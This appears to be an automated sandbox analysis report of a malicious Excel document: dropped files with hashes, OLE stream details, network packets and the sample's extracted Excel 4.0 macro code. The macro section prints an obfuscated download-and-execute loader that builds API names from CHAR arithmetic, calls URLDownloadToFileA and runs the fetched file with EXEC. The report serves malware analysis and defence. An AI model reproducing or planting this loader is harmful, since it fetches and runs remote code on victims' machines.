                                            Preview: p...... ....`.....@.N...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                            C:\Users\user\AppData\Local\Temp\CFDE0000
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):316187
                                            Entropy (8bit):7.983905136577644
                                            Encrypted:false
                                            SSDEEP:6144:nFrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MO:FFPM8R3AsB+bjej/9cz
                                            MD5:551FC976D8151523E30707557B87470C
                                            SHA1:8BEBD3FDF3D512E5DB5F1753E3503849CD122279
                                            SHA-256:9EA29D88488069303E289192FA4D1E77B4BC5ECA3435DA53F49CC5920FD193E5
                                            SHA-512:B6CEB5A4754E436ED0DAB083C03FADE16FACE3E66FFC2051DF315753CD3A136827E2D10E163660DA3F16435248835172FE8F59999BD707CD3B39F909BCAECC53
                                            Malicious:false
                                            Reputation:low
                                            Preview: ..n.0.E.......D'.....E....I?.&..a.@.............C..s.R.x~..x...55..f........._.wR..`.......Y|.4..9..V.P.6F....[.,T......E....._....l..rk".X.A..b....-^.;YJC......&.9%9.h.>.1..v........Up...-@.r^".?@..X .(.f..:yN.WxPaP2b.....Jh.._0.7.i.....?..^.(.....V.g..Kk..i....%l9.*'Vi..3l...4/.O.re.......o....:..#>..F....#..N.....;....|......._c.yV..zT.:...r...h~=.~.2#..w...p/:Fn.....l.n......s.@.......p9S...s.......8..u.....^&J.........r...8......... ...&D....e..i...........PK..........!...|j............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\CabEA60.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                            C:\Users\user\AppData\Local\Temp\TarEA61.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):152533
                                            Entropy (8bit):6.31602258454967
                                            Encrypted:false
                                            SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                            MD5:D0682A3C344DFC62FB18D5A539F81F61
                                            SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                            SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                            SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 11:52:42 2020, atime=Sun Nov 29 11:52:42 2020, length=12288, window=hide
                                            Category:dropped
                                            Size (bytes):867
                                            Entropy (8bit):4.46318653349391
                                            Encrypted:false
                                            SSDEEP:12:85QVCe7LgXg/XAlCPCHaXgzB8IB/N4zX+WnicvbSGbDtZ3YilMMEpxRljKLPTdJU:85UCeJ/XTwz6IgYemqDv3qmrrNru/
                                            MD5:386DDA3061844C1253CDD19FCB48784C
                                            SHA1:13EB11AB0C824BCCBD072F4F96C8033B5CBA0613
                                            SHA-256:1E52589AA657CF86B1CE95C1523AD4E1D8D256328DD3E2A47AB304493076DEF0
                                            SHA-512:84ED0057574B971DD57EA756D6EB0CEFC9B1CA082D9EFE8EAD006B048BDEAFD59ED6B68C110D8EFD2329FB7F033445143A13819FD94D200480DF6AF53C955D35
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F...........7G..t...N...t...N....0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Q.f..Desktop.d......QK.X}Q.f*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......549163..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1423769819.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun Nov 29 11:52:42 2020, atime=Sun Nov 29 11:52:43 2020, length=339968, window=hide
                                            Category:dropped
                                            Size (bytes):4236
                                            Entropy (8bit):4.51967895453544
                                            Encrypted:false
                                            SSDEEP:96:8T/XLIkLuQh2T/XLIkLuQh2T/XLIkLuQh2T/XLIkLuQ/:8nIkCQEnIkCQEnIkCQEnIkCQ/
                                            MD5:CFCA1146A3B2FE4538245AF497D8AEB8
                                            SHA1:88075A7CDAB10969F63032370B63F804709201AA
                                            SHA-256:FD29FFFDAE8190C7B3A564DCD8DDC27C6CF97E8DC6514385E3EE3562DB91223A
                                            SHA-512:ED4BFAB71E73903A2D819AF5ACB7311772AC7A900283774D4B10EB158DEA73614F3E48FDC0F023B58DB83E48F41FBFD78F28E0973287B3DA0ACD53AE33794C51
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F.... ....b0..{..t...N.......N....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..0..}Q.f .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.2.3.7.6.9.8.1.9...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\549163\Users.user\Desktop\document-1423769819.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.2.3.7.6.9.8.1.9...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......549163..........D_....3N.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):232
                                            Entropy (8bit):4.892151289256036
                                            Encrypted:false
                                            SSDEEP:6:dj6Y9LLCFSELLCF6Y9LLCFSELLCF6Y9LLCFSELLCF6Y9LLCFy:dmKuTu6KuTu6KuTu6Kuy
                                            MD5:99832748F590BC7ECC73948669ABE756
                                            SHA1:C166B08ED85A183B1046985D5655E9C0027AD94D
                                            SHA-256:4A1018094266FC46210FD8D07FF81F41EBE7D97BEB47E1BDB2E9DE1E6C6685F9
                                            SHA-512:591278D058983DE3CEE0E245FEC4622378DD56892B28BEAB921FEE2053B401B916E199472089E3D1A251C4D17DBD7CA0B2341008010A9EFDD3D54B517F01AF1E
                                            Malicious:false
                                            Reputation:low
                                            Preview: Desktop.LNK=0..[xls]..document-1423769819.LNK=0..document-1423769819.LNK=0..[xls]..document-1423769819.LNK=0..document-1423769819.LNK=0..[xls]..document-1423769819.LNK=0..document-1423769819.LNK=0..[xls]..document-1423769819.LNK=0..
                                            C:\Users\user\Desktop\61EE0000
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Category:dropped
                                            Size (bytes):401133
                                            Entropy (8bit):7.183474193263243
                                            Encrypted:false
                                            SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfdZ:cizo8RnsIROnr6n75YkU
                                            MD5:2A599D6A3EAC0AE53DA5695599CF5B38
                                            SHA1:5F2066D7BCC847F0B12B7F808D5C1CACA2A84299
                                            SHA-256:506BDE6AA7A698C63CA572EB37479E03A4CB27DBA4683B3B3D6D31A2ECF3FF63
                                            SHA-512:03DE1EC27EB58926EF6BCCFFDC86E56004B36A884EF99F58FE6CF473D570B2A6DC498DBC9B555E5E1EB06E696A84A8EDFFE536BEA24794150DD8AD1E16C69E7A
                                            Malicious:false
                                            Reputation:low
                                            Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:46:44 2020, Security: 0
                                            Entropy (8bit):7.520334201805138
                                            TrID:
                                            • Microsoft Excel sheet (30009/1) 78.94%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                            File name:document-1423769819.xls
                                            File size:339968
                                            MD5:1d20db444db998eae5a4970482e0f177
                                            SHA1:dd4e3b177804910b5a42b4377a1913fcca85baad
                                            SHA256:31d3a487f454a78f2ed78b95c309a6841052e010ea33fcc53f1faba5d22d11f6
                                            SHA512:01fb697169b6876c153aa08944f8a9a6d39ffc575cc0cce7b7742a81d42e1fd2fd85c1d77a9e815f696175d1ec72fc7bb7d3c4e8f5211d4ad4498b4cd66434a9
                                            SSDEEP:6144:+cKoSsxzNDZLDZjlbR868O8Kfc03pXOFq7uDphYHceXVhca+fMHLty/x2zZ8kpT+:5izo8RnsIROnr6n75YI
                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                            File Icon

                                            Icon Hash:e4eea286a4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OLE
                                            Number of OLE Files:1

                                            OLE File "document-1423769819.xls"

                                            Indicators

                                            Has Summary Info:True
                                            Application Name:Microsoft Excel
                                            Encrypted Document:False
                                            Contains Word Document Stream:False
                                            Contains Workbook/Book Stream:True
                                            Contains PowerPoint Document Stream:False
                                            Contains Visio Document Stream:False
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:True

                                            Summary

                                            Code Page:1251
                                            Author:
                                            Create Time:2006-09-16 00:00:00
                                            Last Saved Time:2020-11-26 09:46:44
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Document Code Page:1251
                                            Thumbnail Scaling Desired:False
                                            Contains Dirty Links:False
                                            Shared Document:False
                                            Changed Hyperlinks:False
                                            Application Version:917504

                                            Streams

                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.367004077607
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . 2 . . . . . . . . . 3 . . . . . . . . . 1 . . . . . . . . . 4 . . . . . . . . . 5 . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 bf 00 00 00 02 00 00 00 e3 04 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.253094628
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . ! ! . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 21 21 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                            Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 327649
                                            General
                                            Stream Path:Workbook
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Stream Size:327649
                                            Entropy:7.64866061814
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . f 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . l . . 9 P . 8 . . . . . . . X . @ . . . . . .
                                            Data Raw:09 08 10 00 00 06 05 00 66 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                            Macro 4.0 Code

                                            CALL("Ke"&????2!HR362&"32", "Cr"&????2!HT390&"yA", "JCJ", ????2!HI360&????2!HI375, 0)
                                            
                                            CALL("U"&????2!HT380, "U"&????4!E65, "IICCII", 0, ????2!EE100, ????2!HI360&????2!HI375&????2!HI389, 0, 0)
                                            
                                            =RUN(R59),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(????4!D50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""Ke""&????2!HR362&""32"",""Cr""&????2!HT390&""yA"",""JCJ"",????2!HI360&????2!HI375,0)",,,,,,,,,,,,,,,,,=RUN(????5!A50),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                            "=CALL(""Ke""&????2!HR362&""32"",""Cr""&????2!HT390&""yA"",""JCJ"",????2!HI360,0)",,,,=RUN(????1!M66),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CONCATENATE(E67,E68,E69,E70,E71,E72,E73,E74,E75,E76,E77,E78,E79,E80,E81,E82,E83)",,,,"=CHAR(SUM(F66,G66,H66))",25,35,25,"=CHAR(SUM(F67,G67,H67))",20,42,20,"=CHAR(SUM(F68,G68,H68))",25,26,25,=CHAR(F69-G69-H69),100,22,10,=CHAR(F70-G70-H70),200,50,39,=CHAR(F71-G71-H71),500,300,81,=CHAR(F72+G72-H72),120,130,140,=CHAR(F73+G73-H73),200,300,392,=CHAR(F74+G74-H74),400,500,789,=CHAR(F75-G75+H75),500,430,27,=CHAR(F76-G76+H76),310,270,60,=CHAR(F77-G77+H77),200,160,44,"=CHAR(SUM(F78,G78,H78))",56,37,18,"=CHAR(SUM(F79,G79,H79))",27,18,25,"=CHAR(SUM(F80,G80,H80))",44,58,3,=CHAR(F81-G81-H81),384,115,161,=CHAR(F82-G82-H82),762,504,157,=CHAR(F83-G83-H83),501,328,108
                                            "=CALL(""U""&????2!HT380,""U""&????4!E65,""IICCII"",0,????2!EE100,????2!HI360&????2!HI375&????2!HI389,0,0)"=EXEC(????3!W36&????2!HI360&????2!HI375&????2!HI389)=HALT()

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 29, 2020 04:52:27.287772894 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:27.421179056 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:27.421355009 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:27.435904026 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:27.569210052 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:27.577572107 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:27.577629089 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:27.577666044 CET44349167103.21.59.169192.168.2.22
                                            Nov 29, 2020 04:52:27.577933073 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:27.620861053 CET49167443192.168.2.22103.21.59.169
                                            Nov 29, 2020 04:52:27.759216070 CET44349167103.21.59.169192.168.2.22
